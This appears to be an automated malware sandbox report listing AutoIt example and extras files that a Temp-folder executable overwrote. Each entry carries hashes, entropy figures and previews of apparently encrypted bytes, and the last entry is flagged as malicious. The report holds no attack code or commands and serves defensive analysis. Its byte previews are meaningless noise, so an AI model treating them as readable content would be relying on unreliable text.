                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1427
                                                                                                                                                                                                                                                Entropy (8bit):7.868484325114691
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:ufqORaQesKYZPyxrU6V2vkQ7inSfaBTjABoo+cr/NjmJrc0YXUZtwsTW:EqO9XPorU6V2vkfaaCnV4o0jZtwh
                                                                                                                                                                                                                                                MD5:26C54084B08092A3AFECBD12CE5B7938
                                                                                                                                                                                                                                                SHA1:EB0658F978EEED6DC719AB2BDE21044085307B7D
                                                                                                                                                                                                                                                SHA-256:9DD17B51E829163F03368D2D260D369A58AAF8D66C93E1FF2C4ED73179DD9905
                                                                                                                                                                                                                                                SHA-512:8252FB3BB3DE59C17C0D8ECC5C1E488769B16D6D8510465C0EE5E4D38E5A5F756ECAEAD076E76C5120C17097E2D5DFE517DE120072F8BE2530BC7A4C89A9CD18
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..YI.//DU;..L.h..w..1.j.e/._K ...f.s.j.-.v....J.,Kt..1.E.h..BR..Q^....i..n...U...}R.....t..t..i..<.h.7.....p.....ym.R....L.Y;.m......B....~j...W1.K...nF.)f..7R..1.....g...@..nx%..}N.yU8...0.Y#..:)V....`..._..........0..=...U..s...O...A.e|].M....i.4.M...."X7%.V."...e..~..<...>.QMV...l.bX|(*nX4>.Y....r....z._..|.S...PdP!K.B....!U.H..@...m.0.<.<W._:..Yr>\.....G.%....M.....Xd.;....9..&../<.+....q[..ua.[r>...=....).T....Uy.$.Y!.Mx!.&.W.......q...n'......W.,.0...!.<S.'...8.t..U..YGL..-x`F*%>\..Lj.;....<q...6sx..PL0G...D..>.}$5<.u.|..n..WC....On..U..B>0..=]Ai!..kU@lg.....a..m.V......y...@..e......I.......9+V%....V.i,Aq^ ?...<.d4... ....vQ...G.&....SlLo.`.h.0x.O .j.M...k..g.......^.IH.F..v...v .[/.....=.N......._2c.........$D3...a..=lR..b..%..w.)+..........,.(.'H.N...oV.3...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\_ReadMe_.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):815
                                                                                                                                                                                                                                                Entropy (8bit):7.7247436208273115
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:9I9wP6DIoqrTUBr4ZVS+p2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOJ:qKCBaS+p2jmJrc0YXUZtwsTYE
                                                                                                                                                                                                                                                MD5:10EDC520225AE00D964296E5620D4A9B
                                                                                                                                                                                                                                                SHA1:143E85C8E99CA21752D81788BD1B8249DD54A626
                                                                                                                                                                                                                                                SHA-256:E7F47E36F04D9CDB5C84E7F5CEF3E8D370333DA205B3B193B401DB5DDE517E6D
                                                                                                                                                                                                                                                SHA-512:338DEB52347CDFE76FF50C4CE7F1C6FA9E8CF8E868B89717BDB26CC215E77C62D125D0CB859B5622C25F00679474597E335A27165DF94824265C77486D6D53C8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.g...24.....`.C.CXE....X.....l.8.Yu.. .K.,...l..G..I^IVlp...m.1V.yO....6.^.....$....j.....t..zG..YQ"....2c'..%..L......M...!..v.'.".1#.:..%.v?.#..."...<.....>Y.4.*H.P..T=....Y..w..#..nwe..v...V.Q...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..rOMv..z....n|.. .G.h...@U..#?.@b.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\calculator.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2475
                                                                                                                                                                                                                                                Entropy (8bit):7.9091261992880515
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:X7exdNRFqMkUPUTYWUu+ePOoh3/BIx584o0jZtwtU:XYYMkWwv7POoR03letU
                                                                                                                                                                                                                                                MD5:66C12533CE38C44941B6D4FE30F047A1
                                                                                                                                                                                                                                                SHA1:3427850EBE88CFA65526610E623023B4616BA201
                                                                                                                                                                                                                                                SHA-256:78BEDC724E1FB431D1932A164869E881447389651DAE645CA338C87B92F4C248
                                                                                                                                                                                                                                                SHA-512:86A5662BCE928E62A8E1BEADCD33A7C761BC5F6D9D8D05AF6EA6A14A853C717E31681EDB1AE3AB36D77B44525073165D21B9C1A2140BDDF6D34E17D191E7611D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:9w.....k7.n8......p.)...GC...-......`.%....B..q.5..4a...M..;K%Z...;.J.........d.....hdS..u.2..#..{m.{.o....|...C3..D.{G..o.L.J...%Z.d.N....._...(.i/0.%.....8..V..3..Z|..(.j.g...O.."....9.`.@..A.kg.+U.o.KP../.......n..[rO.*...&.i~;..~...t.....5^.WA.*..j*.}.d......uNq..v.$....2.0... _..|...N.sr..=....r.?.Y.rc...:....[.#...Jb..%\^...~U.k.w.5..%..#...I...=....Q!P..#.1(J.)..u...b..@).T6uE.?.z..A..::tJR.~?....&_.L...D.O.my. ...@.?...u?zm..Y..l{.g].e\ .I%.w.._.h.a...>.E...z[.6...lG<l.;...?Z...I..u..8./.T..z.......[.o.......Z..C.PJ}..rW@.op...>c.#........%'...Z.........M.++D..........G..f..f.n.>v...C.N*....1..Yp.8K..D..Z9.....n..N.;T..E.l..MJ...Q.~.#..K..o.$V.A.\..#.!W..0..$C.+.2.+.....Wa..{..#.a*....l..,.m........S....B........=.C.-Xc..,..uJ...E..`..2..........+.[...!o<...^...m....zY6.>\i..-..*"i.>.<.&b j.Z?^.JN..S.K..6.+B.^.G@......x.....\.*.1~.J.,...C>p<3....;.....^...C.6........*.m..6SKlgZa.,5..6.M.2.S..s;2.A.6.]VM.......2........Z

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\count-do.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1911
                                                                                                                                                                                                                                                Entropy (8bit):7.890511398103584
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:86Ko06UcisQkklR1G7UOAD4UL70L/YIDVODRNLjOvGIyOzscajmJrc0YXUZtwsTi:8m9JklRgwaK7yI1NmXyCk4o0jZtwZApc
                                                                                                                                                                                                                                                MD5:25B03C8169697CEEAF9B836061BB4564
                                                                                                                                                                                                                                                SHA1:245BD1988DDCDF59094EA08E1260D4311F915C64
                                                                                                                                                                                                                                                SHA-256:EE9D49E0A4D2CA45988C6FC644A9D9BCDEB6272C94D2599595D66C6253538C21
                                                                                                                                                                                                                                                SHA-512:A0B8104FCDA2EC1FF1194B92018149F58CF9129C398CC8D2AA9E07016E9450A906AB30EB479C903402FA7C82BE2117011AC6949221CDFBAE9D14A5898F214CEB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.J..&.w0.I.....=.G$x.....u...P....?..kZ.:.....<.e...'..0'..9./...-.z..A...<.-.9._.c.xx.J.G.5..5/a1.O...2..jD&.........d6......1O...#...K.......:..C.o...t.......u.7)R...B.j..m..h60./S..3k..= .Q...4,.(4m2.v.[........,}...@.j..O./.....v..e....f..V.....QH.j...O_]P^G...[...#..........}Z.g.+]...mv..{...u..dt..tJ.].:3E.t.Y%.Y.P...E8.ov....{ ...W.kw...M...R.=>.^y.?..O.:....u.....(r.. ..L.q.s..1c.......q.%........./.N..Ko.|./fTR..).=.tk~.].[..E.JU.Ij.q...IW.s..#q.Si.E.5.N..l/)....A....wt..3G.g.r.W+......q..1..zEd..x.....}.....^..z..Ds..%.VA..wA%y....(b-F...+..b......T.N.....i.R.v..?..'..Y.......*.e.{.W..r..Ql..4....'8g..~..(~..u...._.T^.....g.0.....AM.$..[...5>..`C-q.$..!|..8m.k.g.....xM.<.!..@....S....2#..2...e.J..].....x.>..U.;`$...C.T..@`T.t8.h.f.I.M.H..aH1V.&..).#.N..VVR[...[V..?&{....;.....f.....?EK.......Os..0...x..Pf.r.....(.&.P.^.8.l7......S......R....|...(.k...88.eB.......=.8ku.Ud.-...S.@.8.X.....8L...H.mh..:.j\|..NH!._.......

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\count-for.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1694
                                                                                                                                                                                                                                                Entropy (8bit):7.89186838733798
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:hk3HsVT2Zf5sENl3Brzx6+v0wZ8I4o0jZtwBb:hvkZ+ENlHT8ZleBb
                                                                                                                                                                                                                                                MD5:C669FA9E8B2CDBA1D44FC5A2F28643B1
                                                                                                                                                                                                                                                SHA1:69ECC8FE5962D841A7DC6FE7322D7E1EE3DF99EB
                                                                                                                                                                                                                                                SHA-256:C56557723A9A38CD16EA0C2584A1E43282F750119B582F53D9A4C945370DD335
                                                                                                                                                                                                                                                SHA-512:FB3D6AA76B521D821AC9FF712DB6408BFDA976AB366B0EA969515BDB272A24BF9E93D459263E4E2174C84FFE70AC39200CDCF8C29D6F63D2E269B9FB106FAD47
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.!..$q(V~....z{.P.'.O..4M(.uZ...........5{q'ly...hl....w....Z..$<=....k....Ya..9ew..B..%........,^%....5X..Q.^-.w.1?..o.*..H...1.on..-L...M..mDo..~Uf.......a....A..Y.J...3.\^)......2.%.:......([(..1x..-g.e.../Nd.....T...%......p..?......F.D.u...`/U=;.wJ.|x.k..T...3.Jn...Amu.Q.....y._.:{.i....X.`>.....-.xn^..4..>.+{.....$...".dy....xo....w.BM.0.....4QJ.)....A,|p#.;...._..o}..0.Gt.......bU..^.I.$Y.]8..qr.L.Z*m.C.jc..v.l.IK...Z.c.h.l.+...n...".Rlq...a[..{P...z3.*....5......#0R_2.%@e.r..'+......@.X....qb.....I8.+....D....k...]*.kC..!.......H..bC...].|...;..H.....u2}.!`.Psd;.0.5.............^i.u...J....R.o.x.....l.G.i^3..D|..kJ..BK)eN...S.*..r-...!3.s..-....L1.z.%)s...i{.>.+..z.r.R.P...*\F....I6...........Niv..$.`..L.O......i<..... ..Q.;'...z......>.....)......#.z.....uj...N...@....z..nV.G...JH.d.C'..\..L..v.?8.7....d:.p.....!.q.Q...37...a...@i.y...k/...<i.{....._.a..~..= mm..g..............QCaNg...../......N..Crp.........|...Jo...~(.....[..-...P.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\count-while.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1903
                                                                                                                                                                                                                                                Entropy (8bit):7.88919996565879
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:ubksafrWEYWpvzoHmC1lCM27DShJG4o0jZtwnaHwc:gkrWEvzoGC1oSblenaQc
                                                                                                                                                                                                                                                MD5:9527157ED4EDB36AFB8E1F7A6DD67303
                                                                                                                                                                                                                                                SHA1:E49B265E1C74F00BEFAD21A9871C580C299027C2
                                                                                                                                                                                                                                                SHA-256:EDC79ED4E40E271720FD297848EC3EEDCB066A48AE13D9FF22E18A888BFA7C7C
                                                                                                                                                                                                                                                SHA-512:4DB0623A5E7F34DCF74B14939C3C90987C683593C3765DEA6C364D6FFECD9D6330B2CF187E9078C1D26371A3B41B13C0D8DF380B5E042FE95D9FB56BD6439AC1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.ru/..`S...(.m.9...;..BH(5..I+\....p^...7.F..0w!.....#..T......I....(.-...8...r.;8.y.Y.k....z@..D.......x>..k..~.{.EM....!U(.....l...#/..U.Q7:!...Z..'F....?d.%....w.).....>r.9.......`%.N:.+0.........Y./,...q.p.G4d~..yr.]..r.8Y...(.mm:H.#.....?....u..'&.N6C..E".^.........G..3&..($..|...@=.z.....s...t..Y}`.L...O..5....(F.)...C..R.&#........G\.....]nl.plVm.-H,.>..N..k.x.....P.M.ao..fR$.]5.h......)y..3...A....B.AE.o.mz.:]*..).1.8.k.u...I..f.&......_.W.ZUz."..P07on..[..M.v..f.......|.9.;E..'.-k.....5..t...e8.T...-.....\...."9.s.... ...k.?.a.._~.......U.%.@...[.:.BN.i_`X.......s.h:;..)o...m.....!.~.8S.F...c..]h.'......(B...........&..'.}....R...K.P...v...M...l...znB\.v5;@=.rp..n.P.....-?..m~M.$......X..%......!.*.......'.u1....r..*jK.....rj....{L.:...1.n....~'D..0G.5..i..+..cP..=.9w.[....1....3I...cM...;..>v.!.....|..r..+.p.[...k> %dF.Y.Mt .sZ.\...m{.~.O..J.r...J..e+rci..n.......|^XW[k_..\a.v..m......f.Y.....{......C..,..M..O.%-#.n.P...#Z.H...&...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\functions.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1880
                                                                                                                                                                                                                                                Entropy (8bit):7.898071007568795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:oBZif6PDTT4NKxsTlOfCGdWDBHE04o0jZtwjF:mPesfCGdoHE9lep
                                                                                                                                                                                                                                                MD5:2C221DD04FD1AF0A847D809B46D2AB2F
                                                                                                                                                                                                                                                SHA1:B37CEC7A68BB4E2982A610AD02861B286961AB14
                                                                                                                                                                                                                                                SHA-256:7E23B4C5705AF8816604B07E23ED88321624BEAA4F2AEAB0D2986C7762441F89
                                                                                                                                                                                                                                                SHA-512:0AE10B5C568EB7F3583C9223642B1A70043E596BE2BE08BB99DB8E9748225B87055C4CE8ACBD8F0D82FC408207143B8A229039FBE5EE692C8CDF0B43A906F02A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.t.T.^".q.9.Ve...@..U.......`....7C..A0...6. .S.. ..d.....Ft.%.._..;.3w...Z...V..d%>...x..M..,My.7..V ..H^].......c.Lh...E..V....h...w..@:....TF..2....O.e<......_.G|.E3B.......8.dM..MJ..c4.r..%.i..)B:<..U..$..........#.G.-..E..>b...9.H...*..]....U.`n.8.......C^V........q...Dt.v..'7c^+....&....dJn0.. .1.......A.]..._.`.!..}.x..A.. !i..6.TD...<....\..bC.; ....,.B.2..#.<..o..e.ji?.-..#.Q.....V,..i.|Z.qh6u&..M.O...<.y..L...., ..^.W}6J.,.b....|...Ut.+..:....@...n.$;..c...-Y.. n....wN..!.......1sT...&...}[.9....1..N..2.]..d...J....;l......P.....C.GzS..~...........Y..M...j6^.Y....>(.N@...r.M0.......}5d.@...4..[...*'.e.fI....-.H*..`i.@%.../........U...;..Aya.3)..o....!7N..L..S^B!.....a.....p......}...b.q3.....I...*I.t.R.WvWhq..........HT.............7.........R.eK..bA._.....e..._.\.i.Z..u=....[.../...)..~1.pB....Ts..r.../....:..y.......e.......Rh.4....j.A.'...iE......%.N..u._.T[..(..........r..;!...=.Hz...."...I..V....J...j$.l..L6.......c...(/..w.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\inputbox.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2436
                                                                                                                                                                                                                                                Entropy (8bit):7.922462502171897
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:uDYZN3IM+EEOFWllnaMgpO3fUuE6Wguqo/idPYE00UAzU4o0jZtwFta:uDYUlEanaX03DEOuqo/iGX0XzdleFta
                                                                                                                                                                                                                                                MD5:20D84F6D515252A30313BD6938CF2DFA
                                                                                                                                                                                                                                                SHA1:D384C2F7275D075AEBE433CBCFF49D8E263925B9
                                                                                                                                                                                                                                                SHA-256:8C71B4C615DC4F4FB3A13FC79DFA7390491DB9142B63634870170F761A807B6C
                                                                                                                                                                                                                                                SHA-512:50B8079DD276BB4523D35CE6D7530A4C6CDF63623851856BA78E725D3EBF53C219A28A5A7B3BAC12AF79BC2793503DDCE9801A0ACF3EA328901F9D93B411BEEC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:U....PN..]..{).?.6.-....F.C..r.0Ti3z...A.U......k.O.....bv.^Y.K...Q.D......\...k.[....b../.|..M...V..c`x.[.c....?/.w.../Nz..'.Z..Sr......i.......y..C)=TO..........f^.j..^R...S.3\....V...iYGu2v.3..<..|.;..?_.T..i]]..ZiF.c.A...|.....u..W.....x..&.;....{..k.l9..B...:..%...<..y....4..jx....\N....sX.g\.d~...i..s..!.........;F..].<c..([..;7..L1,......N.}....q.....2Qc..Pj..r.I.o.T..........5..v..%.f........i.(/.!n.....(xm.....5..3..Z..G...... e..Yr...@3G .{.....'+.m........9....'h..8.9.o.D(..z.4.l.N.@.E..h.....9.&]....?g"R..kS..];q.....j.b.j.#.?..E..-..\.t..../..l..a.Qr......,./...5Io..%..6x...D.F....p=..y[i......2.@H...@...x...O...y......m0,....zH..[..y..ZO`..*...]..ekQ+...j.h.b..ix.....]..._E".0U..Mz...7..Y.-.tTa.....D..,.l..s..<....g.....3}v.0..g..o.l.b].S:r6..cX...d#*Qd.r..)#.c.B........2Y..M..)...........h....XyD....4....z...`..D..].{..k.)v U...6..3(C..|....E.J*.9.:.\.>.....<.S..._.'.X.Q...a.S.......H..-.{...R..f...^.I.-..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\msgbox.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1067
                                                                                                                                                                                                                                                Entropy (8bit):7.821230486730415
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:nQ+IVPiM5d6tVchOjqJKrvYjmJrc0YXUZtwsTt:ZwiMD6tVXq+u4o0jZtwq
                                                                                                                                                                                                                                                MD5:93B37E8A68CB2452AF7D79217D8A1127
                                                                                                                                                                                                                                                SHA1:9F266B6EC0724795C28AA7791E700D9F2FD5EBC2
                                                                                                                                                                                                                                                SHA-256:E39C2457DAF9FFCBF307627E79C0F19F8DBB15447A5E885B4EDC14B2B328BECC
                                                                                                                                                                                                                                                SHA-512:20735AAC8567B35F868ECE987EFAB1DC5599377E9BCBB3AE5F2A69728F7170DE34DCDF630D2A6BB9C634880AA30A0667D7AFE2870BCBD54C91D86208E534F876
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.7..9..R.9........4V..B.!j.w..r...v"i....."....[..f{T.h.....q...R..K7yh...<M.z.C[o..R60...o!..Gm$..l...r~b.K6...*c|.v.W3zuSZ.@3{TY}......#...'....D.@$.f..(...._O...].g.x...>......6...D......y.y%..l..||c.y..@m....Y..u.+KgvJ<U*.9Q5.W.7.E.........H....J...m.<~.i.7.\\]7......$9t...;.:.4.^0_.WG....^.o.....v.?..<.?w....x.r.?X.U;....o..nX.u>@.$cu.7..3(.l@)k..JP..s...."....Rqc.3a....0....{..Kt7........Zu....'HeX......$.J.o..<#.......1..}\vO!..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\notepad1.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2446
                                                                                                                                                                                                                                                Entropy (8bit):7.910950902572371
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:6HUfVCdJPPTHUj4Lf5KGztL1vLluY/zI4o0jZtwW:KGC7U6f8GRZvLkY/FleW
                                                                                                                                                                                                                                                MD5:DD8B7B35744B48A0643677B24D99EBF8
                                                                                                                                                                                                                                                SHA1:5C87EB947777E1A7A2AC5F0AC408C167B030E79B
                                                                                                                                                                                                                                                SHA-256:3B5BB3CDDEDA244AE10017226FFDC6726CC20F3CC5CF45E6157544F15A7885DA
                                                                                                                                                                                                                                                SHA-512:206C52E85834086754ADE53907E7B012A1162613A82F25FB85D4C85F585088D7AFDC65DFEC0B4A42EF8FA78E6F4CA8A22BBA66CBFF4F28F779CB5C1D7F01FC21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...aLn....a..&...$.k.D....h.[..X.a..D0...E...T.J...Qj.I.F.l.?R$q.g4...~..{..7.M..]ME.<{.t...f_W,....a(..........`..&oQ.z^.K.k0:X8.Lgql*.....7............&.>..U....<..|.F[....rc....#.../Y.v...D&.G.W..?....v..9*>.N..F.Z.....S..d.....>.......V..=n.(....J...UV......D...>...b>Hf.q..J~.H.b.l.1P*a.@Z9k)B... .j.C?!...gP...vZ:..,..H.].....t2.P.0..;.:...g.|.3W..~.K..O47.....8+.='.,t... .>....Yg))....Q.y)..!.1..d.WY..e..9.E.d`y`<.....P#...Ic.,Q.W....a.r.....!..ee.L.....$Z..h....d....Jd.1...>`....E..@.S.7..p.g...S....uh..P4Ip....3...._.^Y$?..".......~.........y..r.).H.....k..S..q....eN....q..Q%...5J......M.u ..8.. .......<+.../.h.....!wnT....4....K..L..2:/....ni.>...I_.P.~S.....9<..........D.II.......6u......\....T..?....dCH.zj.p.>Au#.IU...p.....6.l..|JN.C..7..rMi.N...[.w....(>Bre..........ztlg.V~...3.B..8.b.:..C..P.JA..'..l.8...Qwz....sX<2,B.3..Y..'...#.........6$h..L...%}.Je...~.........s..?z...S....j..t].T..U..Xz....._..{..O..U^B..R.>.R...}. ....6

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\notepad2.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2156
                                                                                                                                                                                                                                                Entropy (8bit):7.907891683642084
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:oeinTakFeviEH4wIO7paU53XcKwK4o0jZtw7:1z6S6I70UdXcKole7
                                                                                                                                                                                                                                                MD5:88AB97F737C12AE671DFA33EE946A78E
                                                                                                                                                                                                                                                SHA1:0FEC4DF7BA0115EE4FACE1C0C9CB1909245593EB
                                                                                                                                                                                                                                                SHA-256:B26D7A5BF5EAE278F836E8447C3620D344494A1063E628AE47A8EB8914EE55BF
                                                                                                                                                                                                                                                SHA-512:65616E09C7BEEAD5621EBCE4566AA46DE9E078B90936FEF3064DAE2916D523A69A7F73D7751818501CA708AFF750F3C16F5D8B873AC0C04F370A179720738D03
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...LO);.c.....j0}...ba;2G......V=.w..C........1?O?...~E.X.&..5._....*...K.,^..f..@. .'......".`..6...~..v.r.mIAb*.........a\.E...<...z...O.$xQ..B..Nf>f..*.V:n..VP.K.....V....MUn..T....!.....<uF.9.....{.L.%..*....^.A.z|.n>.....tZ.Ut.u..O..........5W..}.t.....r...#...\.%.8..*.`....._Pl../../....ki]..... b./..Q.....".....b..-.tP..S....H.nU........B........w<.*..p..h.~Fyr..`bD~..7.j....."..POi6...........t..4........`f.2`.q.G/..4.@.. <m."ha.C_...c6x.V\....._..6q.R.+.9.&..Jp\..6..\.R.7&....<.+Cz.0.....!.=.8bp...[M.`h.Sq.Y.KcCM.....s....7G......|l.$AY<&..,...E.=.U./.?..?...DD.$%U....Ie..A.e#.J.....ED.=.3..'..4\.C.c.=..m4......S.M..x<..c.a_........Rr.>.Z....."u....P.....l.V..../.Z)@Z...M...`K.....<.:.....Tf.....G. Pq....$.<R.(......-,.s.c{...,5.q'.......|..Nu.:.+..4...a.q...n.$.o6.N..I...j....f.=.rv.=..a..Wm..>....0.Y.c.y.>L..b?.jX^...4.*og.".'...73d....6$.....R.M..h.=W.E.KQ...8.=).qqW...B.m..$..\.?..gJ~G7.Pm.7......1....%.@.9:V.U..,i

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\AutoSQLiteUpdateIt.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):34452
                                                                                                                                                                                                                                                Entropy (8bit):7.99442096964343
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:L+Iv/SjDHIPFhddDulcquijXiBVONSecWBXqNZC:LDZ3gXuiLMO8ecQ7
                                                                                                                                                                                                                                                MD5:2E86ABBB8BDB99FCB5292F1495BE8B6E
                                                                                                                                                                                                                                                SHA1:073BE718DD76E81D05169AEAA802FE934A783F9E
                                                                                                                                                                                                                                                SHA-256:CE7506B3A5007229F41AFF7DF1FE4A48E1960B4920D46A8318A9247A80DA1160
                                                                                                                                                                                                                                                SHA-512:BD6626E59AAB2B207A95E59DF9648A7E6C1D4C4AA1357E949618BFB070A198C7387ADD033DC24EECE6729CFD694129469EF7B264206EFC5BEB4B5896C3AD752B
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
